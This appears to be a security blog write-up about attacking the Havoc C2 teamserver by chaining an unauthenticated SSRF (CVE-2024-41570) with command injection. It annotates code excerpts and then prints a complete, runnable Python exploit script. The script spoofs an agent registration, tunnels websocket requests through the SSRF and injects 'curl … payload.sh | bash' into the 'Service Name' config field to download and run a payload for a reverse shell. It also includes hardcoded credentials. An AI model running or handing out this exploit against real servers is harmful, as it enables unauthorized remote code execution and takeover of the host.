This post is for educational purposes only. The author does not condone or support any illegal activities. The author is not responsible for any misuse of the information provided.
During a recent engagement, I encountered a sophisticated exploit targeting the Havoc C2 framework. Unauthenticated SSRF (CVE-2024-41570) on Havoc C2 teamserver via spoofed demon agent . After that combine it with a Remote Code Execution (RCE) exploit to upload payload to the server and gain reverse shell.
First, let’s look at the imports and core functions:
import os
import json
import hashlib
import binascii
import random
import requests
import argparse
import urllib3
from Crypto . Cipher import AES
from Crypto . Util import Counter
These imports tell us the exploit uses cryptography (AES), makes HTTP requests, and handles binary data. The urllib3 warnings are disabled since the exploit likely deals with self-signed certificates.
The encryption implementation is interesting:
def decrypt (key, iv, ciphertext):
if len (key) <= key_bytes:
for _ in range ( len (key), key_bytes):
key += b "0"
assert len (key) == key_bytes
iv_int = int (binascii . hexlify (iv), 16 )
ctr = Counter . new (AES . block_size * 8 , initial_value = iv_int)
aes = AES . new (key, AES . MODE_CTR, counter = ctr)
plaintext = aes . decrypt (ciphertext)
return plaintext
This implements AES in Counter (CTR) mode. The key aspect here is that it uses a static key and IV, both filled with null bytes (0x00). This tells us the Havoc framework must be using a predictable encryption scheme for agent communications.
The agent registration is particularly clever:
def register_agent (hostname, username, domain_name, internal_ip, process_name, process_id):
command = b " \x00\x00\x00\x63 " # Command code for registration
request_id = b " \x00\x00\x00\x01 " # First request
demon_id = agent_id # Random agent ID
# Pack lengths of each field
hostname_length = int_to_bytes ( len (hostname))
username_length = int_to_bytes ( len (username))
domain_name_length = int_to_bytes ( len (domain_name))
internal_ip_length = int_to_bytes ( len (internal_ip))
process_name_length = int_to_bytes ( len (process_name) - 6 )
This function creates a fake agent to register with the teamserver. It carefully constructs the exact byte format that Havoc expects, including length prefixing for each field. The -6 in process_name_length suggests the process name is UTF-16 encoded.
The socket manipulation is where things get interesting:
def open_socket (socket_id, target_address, target_port):
command = b " \x00\x00\x09\xec " # Socket command
request_id = b " \x00\x00\x00\x02 "
subcommand = b " \x00\x00\x00\x10 " # Open socket subcommand
sub_request_id = b " \x00\x00\x00\x03 "
This opens a socket channel for communication. The specific command codes (0x9EC) indicate the attacker has reverse engineered Havoc’s protocol format.
Now for the actual exploitation:
USER = "ilya"
PASSWORD = "CobaltStr1keSuckz!"
# ... websocket setup ...
cmd = "curl http://10.10.14.224:8080/payload.sh | bash"
injection = """ \\\\\\\" -mbla; """ + cmd + """ 1>&2 && false #"""
The attack uses hardcoded credentials to authenticate, then performs command injection through the service name parameter. The injection string is particularly clever:
\\\\\\\"
- Escapes through multiple layers of string parsing
-mbla;
- Appears to break out of a command context
1>&2
- Redirects output to stderr
&& false #
- Ensures clean termination and comments out remaining content
The payload construction shows how the injection is delivered:
payload = { "Body" : { "Info" : { "AgentType" : "Demon" , "Arch" : "x64" , "Config" : "{ \n \" Amsi/Etw Patch \" : \" None \" , \n \" Indirect Syscall \" : false, \n \" Injection \" : { \n \" Alloc \" : \" Native/Syscall \" , \n \" Execute \" : \" Native/Syscall \" , \n \" Spawn32 \" : \" C: \\\\ Windows \\\\ SysWOW64 \\\\ notepad.exe \" , \n \" Spawn64 \" : \" C: \\\\ Windows \\\\ System32 \\\\ notepad.exe \"\n }, \n \" Jitter \" : \" 0 \" , \n \" Proxy Loading \" : \" None (LdrLoadDll) \" , \n \" Service Name \" : \" " + injection + " \" , \n \" Sleep \" : \" 2 \" , \n \" Sleep Jmp Gadget \" : \" None \" , \n \" Sleep Technique \" : \" WaitForSingleObjectEx \" , \n \" Stack Duplication \" : false \n } \n "
This crafts a seemingly legitimate configuration with the injection hidden in the “Service Name” parameter. When the teamserver processes this configuration, the injected command executes.
The full exploit script is here:
import os
import json
import hashlib
import binascii
import random
import requests
import argparse
import urllib3
from Crypto . Cipher import AES
from Crypto . Util import Counter
urllib3 . disable_warnings ()
key_bytes = 32
def decrypt (key, iv, ciphertext):
if len (key) <= key_bytes:
for _ in range ( len (key), key_bytes):
key += b "0"
assert len (key) == key_bytes
iv_int = int (binascii . hexlify (iv), 16 )
ctr = Counter . new (AES . block_size * 8 , initial_value = iv_int)
aes = AES . new (key, AES . MODE_CTR, counter = ctr)
plaintext = aes . decrypt (ciphertext)
return plaintext
def int_to_bytes (value, length = 4 , byteorder = "big" ):
return value . to_bytes (length, byteorder)
def encrypt (key, iv, plaintext):
if len (key) <= key_bytes:
for x in range ( len (key), key_bytes):
key = key + b "0"
assert len (key) == key_bytes
iv_int = int (binascii . hexlify (iv), 16 )
ctr = Counter . new (AES . block_size * 8 , initial_value = iv_int)
aes = AES . new (key, AES . MODE_CTR, counter = ctr)
ciphertext = aes . encrypt (plaintext)
return ciphertext
def register_agent (hostname, username, domain_name, internal_ip, process_name, process_id):
command = b " \x00\x00\x00\x63 "
request_id = b " \x00\x00\x00\x01 "
demon_id = agent_id
hostname_length = int_to_bytes ( len (hostname))
username_length = int_to_bytes ( len (username))
domain_name_length = int_to_bytes ( len (domain_name))
internal_ip_length = int_to_bytes ( len (internal_ip))
process_name_length = int_to_bytes ( len (process_name) - 6 )
data = b " \xab " * 100
header_data = command + request_id + AES_Key + AES_IV + demon_id + hostname_length + hostname + username_length + username + domain_name_length + domain_name + internal_ip_length + internal_ip + process_name_length + process_name + process_id + data
size = 12 + len (header_data)
size_bytes = size . to_bytes ( 4 , 'big' )
agent_header = size_bytes + magic + agent_id
print (agent_header + header_data)
print ( "[***] Trying to register agent..." )
r = requests . post (teamserver_listener_url, data = agent_header + header_data, headers = headers, verify = False )
if r . status_code == 200 :
print ( "[***] Success!" )
else :
print ( f "[!!!] Failed to register agent - {r . status_code} {r . text} " )
def open_socket (socket_id, target_address, target_port):
command = b " \x00\x00\x09\xec "
request_id = b " \x00\x00\x00\x02 "
subcommand = b " \x00\x00\x00\x10 "
sub_request_id = b " \x00\x00\x00\x03 "
local_addr = b " \x22\x22\x22\x22 "
local_port = b " \x33\x33\x33\x33 "
forward_addr = b ""
for octet in target_address . split ( "." )[:: - 1 ]:
forward_addr += int_to_bytes ( int (octet), length = 1 )
forward_port = int_to_bytes (target_port)
package = subcommand + socket_id + local_addr + local_port + forward_addr + forward_port
package_size = int_to_bytes ( len (package) + 4 )
header_data = command + request_id + encrypt (AES_Key, AES_IV, package_size + package)
size = 12 + len (header_data)
size_bytes = size . to_bytes ( 4 , 'big' )
agent_header = size_bytes + magic + agent_id
data = agent_header + header_data
print ( "[***] Trying to open socket on the teamserver..." )
r = requests . post (teamserver_listener_url, data = data, headers = headers, verify = False )
if r . status_code == 200 :
print ( "[***] Success!" )
else :
print ( f "[!!!] Failed to open socket on teamserver - {r . status_code} {r . text} " )
def write_socket (socket_id, data):
command = b " \x00\x00\x09\xec "
request_id = b " \x00\x00\x00\x08 "
subcommand = b " \x00\x00\x00\x11 "
sub_request_id = b " \x00\x00\x00\xa1 "
socket_type = b " \x00\x00\x00\x03 "
success = b " \x00\x00\x00\x01 "
data_length = int_to_bytes ( len (data))
package = subcommand + socket_id + socket_type + success + data_length + data
package_size = int_to_bytes ( len (package) + 4 )
header_data = command + request_id + encrypt (AES_Key, AES_IV, package_size + package)
size = 12 + len (header_data)
size_bytes = size . to_bytes ( 4 , 'big' )
agent_header = size_bytes + magic + agent_id
post_data = agent_header + header_data
print (post_data)
print ( "[***] Trying to write to the socket" )
r = requests . post (teamserver_listener_url, data = post_data, headers = headers, verify = False )
if r . status_code == 200 :
print ( "[***] Success!" )
else :
print ( f "[!!!] Failed to write data to the socket - {r . status_code} {r . text} " )
def read_socket (socket_id):
command = b " \x00\x00\x00\x01 "
request_id = b " \x00\x00\x00\x09 "
header_data = command + request_id
size = 12 + len (header_data)
size_bytes = size . to_bytes ( 4 , 'big' )
agent_header = size_bytes + magic + agent_id
data = agent_header + header_data
print ( "[***] Trying to poll teamserver for socket output..." )
r = requests . post (teamserver_listener_url, data = data, headers = headers, verify = False )
if r . status_code == 200 :
print ( "[***] Read socket output successfully!" )
else :
print ( f "[!!!] Failed to read socket output - {r . status_code} {r . text} " )
return ""
command_id = int . from_bytes (r . content[ 0 : 4 ], "little" )
request_id = int . from_bytes (r . content[ 4 : 8 ], "little" )
package_size = int . from_bytes (r . content[ 8 : 12 ], "little" )
enc_package = r . content[ 12 :]
return decrypt (AES_Key, AES_IV, enc_package)[ 12 :]
def create_websocket_request (host, port):
request = (
f "GET /havoc/ HTTP/1.1 \r\n "
f "Host: {host} : {port} \r\n "
f "Upgrade: websocket \r\n "
f "Connection: Upgrade \r\n "
f "Sec-WebSocket-Key: 5NUvQyzkv9bpu376gKd2Lg== \r\n "
f "Sec-WebSocket-Version: 13 \r\n "
f " \r\n "
) . encode ()
return request
def build_websocket_frame (payload):
payload_bytes = payload . encode ( "utf-8" )
frame = bytearray ()
frame . append ( 0x 81 )
payload_length = len (payload_bytes)
if payload_length <= 125 :
frame . append ( 0x 80 | payload_length)
elif payload_length <= 65535 :
frame . append ( 0x 80 | 126 )
frame . extend (payload_length . to_bytes ( 2 , byteorder = "big" ))
else :
frame . append ( 0x 80 | 127 )
frame . extend (payload_length . to_bytes ( 8 , byteorder = "big" ))
masking_key = os . urandom ( 4 )
frame . extend (masking_key)
masked_payload = bytearray (byte ^ masking_key[i % 4 ] for i, byte in enumerate (payload_bytes))
frame . extend (masked_payload)
return frame
parser = argparse . ArgumentParser ()
parser . add_argument ( "-t" , "--target" , help = "The listener target in URL format" , required = True )
parser . add_argument ( "-i" , "--ip" , help = "The IP to open the socket with" , required = True )
parser . add_argument ( "-p" , "--port" , help = "The port to open the socket with" , required = True )
parser . add_argument ( "-A" , "--user-agent" , help = "The User-Agent for the spoofed agent" , default = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" )
parser . add_argument ( "-H" , "--hostname" , help = "The hostname for the spoofed agent" , default = "DESKTOP-7F61JT1" )
parser . add_argument ( "-u" , "--username" , help = "The username for the spoofed agent" , default = "Administrator" )
parser . add_argument ( "-d" , "--domain-name" , help = "The domain name for the spoofed agent" , default = "ECORP" )
parser . add_argument ( "-n" , "--process-name" , help = "The process name for the spoofed agent" , default = "msedge.exe" )
parser . add_argument ( "-ip" , "--internal-ip" , help = "The internal ip for the spoofed agent" , default = "10.1.33.7" )
args = parser . parse_args ()
magic = b " \xde\xad\xbe\xef "
teamserver_listener_url = args . target
headers = {
"User-Agent" : args . user_agent
}
agent_id = int_to_bytes (random . randint ( 100000 , 1000000 ))
AES_Key = b " \x00 " * 32
AES_IV = b " \x00 " * 16
hostname = bytes (args . hostname, encoding = "utf-8" )
username = bytes (args . username, encoding = "utf-8" )
domain_name = bytes (args . domain_name, encoding = "utf-8" )
internal_ip = bytes (args . internal_ip, encoding = "utf-8" )
process_name = args . process_name . encode ( "utf-16le" )
process_id = int_to_bytes (random . randint ( 1000 , 5000 ))
register_agent (hostname, username, domain_name, internal_ip, process_name, process_id)
socket_id = b " \x11\x11\x11\x11 "
open_socket (socket_id, args . ip, int (args . port))
USER = "user"
PASSWORD = "password"
host = "127.0.0.1"
port = 40056
websocket_request = create_websocket_request (host, port)
write_socket (socket_id, websocket_request)
response = read_socket (socket_id)
payload = { "Body" : { "Info" : { "Password" : hashlib . sha3_256 (PASSWORD . encode ()) . hexdigest (), "User" : USER}, "SubEvent" : 3 }, "Head" : { "Event" : 1 , "OneTime" : "" , "Time" : "18:40:17" , "User" : USER}}
payload_json = json . dumps (payload)
frame = build_websocket_frame (payload_json)
write_socket (socket_id, frame)
response = read_socket (socket_id)
payload = { "Body" :{ "Info" :{ "Headers" : "" , "HostBind" : "0.0.0.0" , "HostHeader" : "" , "HostRotation" : "round-robin" , "Hosts" : "0.0.0.0" , "Name" : "abc" , "PortBind" : "443" , "PortConn" : "443" , "Protocol" : "Https" , "Proxy Enabled" : "false" , "Secure" : "true" , "Status" : "online" , "Uris" : "" , "UserAgent" : "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" }, "SubEvent" : 1 }, "Head" :{ "Event" : 2 , "OneTime" : "" , "Time" : "08:39:18" , "User" : USER}}
payload_json = json . dumps (payload)
frame = build_websocket_frame (payload_json)
write_socket (socket_id, frame)
response = read_socket (socket_id)
cmd = "curl http:/<IP>:<PORT>/payload.sh | bash"
injection = """ \\\\\\\" -mbla; """ + cmd + """ 1>&2 && false #"""
payload = { "Body" : { "Info" : { "AgentType" : "Demon" , "Arch" : "x64" , "Config" : "{ \n \" Amsi/Etw Patch \" : \" None \" , \n \" Indirect Syscall \" : false, \n \" Injection \" : { \n \" Alloc \" : \" Native/Syscall \" , \n \" Execute \" : \" Native/Syscall \" , \n \" Spawn32 \" : \" C: \\\\ Windows \\\\ SysWOW64 \\\\ notepad.exe \" , \n \" Spawn64 \" : \" C: \\\\ Windows \\\\ System32 \\\\ notepad.exe \"\n }, \n \" Jitter \" : \" 0 \" , \n \" Proxy Loading \" : \" None (LdrLoadDll) \" , \n \" Service Name \" : \" " + injection + " \" , \n \" Sleep \" : \" 2 \" , \n \" Sleep Jmp Gadget \" : \" None \" , \n \" Sleep Technique \" : \" WaitForSingleObjectEx \" , \n \" Stack Duplication \" : false \n } \n " , "Format" : "Windows Service Exe" , "Listener" : "abc" }, "SubEvent" : 2 }, "Head" : {
"Event" : 5 , "OneTime" : "true" , "Time" : "18:39:04" , "User" : USER}}
payload_json = json . dumps (payload)
frame = build_websocket_frame (payload_json)
write_socket (socket_id, frame)
response = read_socket (socket_id)